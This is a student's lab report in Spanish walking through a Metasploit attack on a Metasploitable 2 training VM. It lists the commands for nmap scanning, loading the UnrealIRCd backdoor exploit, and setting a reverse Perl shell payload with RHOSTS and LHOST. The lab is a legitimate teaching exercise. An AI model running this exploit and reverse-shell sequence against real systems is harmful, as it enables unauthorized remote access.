Andrés Esteban Peña Piarpusan, I044216
Taller Metasploit
Describir el proceso realizado para aplicar un exploit desde Metasploit 5 en Kali a una máquina virtual
Metasploitable 2.
1. Se inicia el servicio postgresql, requerido para el funcionamiento de Metasploit.
Systemctl start postgresql.service
2. Iniciar la consola de Metasploit
msfconsole
3. Revisar el estado de conexión con la base de datos.
db_status
Andrés Esteban Peña Piarpusan, I044216
4. Revisar los espacios de trabajo disponibles.
workspace
5. Crear un nuevo espacio de trabajo con el nombre ‘test’ y revisar que este esté activo.
workspace -a test
6. Revisar las direcciones IP de la máquina Kali y Metasploitable.
ifconfig
Andrés Esteban Peña Piarpusan, I044216
7. Realizar ping a Metasploit para revisar conexión.
ping 192.168.56.101
8. Obtener los puertos disponibles a través de nmap.
Andrés Esteban Peña Piarpusan, I044216
db_nmap -Pn 192.168.56.101
9. Revisar los servicios reconocidos.
10. Utilizar nmap para obtener la información de la versión de los diferentes servicios activos en la
máquina.
db_nmap -sV 192.168.56.101
Andrés Esteban Peña Piarpusan, I044216
11. Revisar las versiones de servicios reconocidos.
Andrés Esteban Peña Piarpusan, I044216
12. Realizar una búsqueda en la libreria de Metasploit para los posibles exploits disponibles para el
servicio UnrealIRCd en el puerto 6667.
search UnrealIRCD
13. Usar el exploit identificado.
use exploit/unix/irc/unreal_ircd_3281_backdoor
14. Mostrar la información requerida por el exploit.
Andrés Esteban Peña Piarpusan, I044216
info
15. Suministrar la dirección IP del objetivo como único parámetro requerido.
set RHOSTS 192.168.56.101
16. Mostrar la lista de payloads disponibles.
show payloads
Andrés Esteban Peña Piarpusan, I044216
17. Se escogió el payload ‘cmd/unix/reverse_perl’
set payload cmd/unix/reverse_perll
18. Mostrar la información requerida por el payload.
options
19. Suministrar la dirección IP local en LHOST.
Andrés Esteban Peña Piarpusan, I044216
set LHOST 192.168.56.102
20. Ejecutar el exploit.
21. Si el exploit fue exitoso, se creará una sesión del shell en la máquina objetivo.
22. Para comprobar el acceso, se realiza ping desde la máquina objetivo hacia la máquina local.
Andrés Esteban Peña Piarpusan, I044216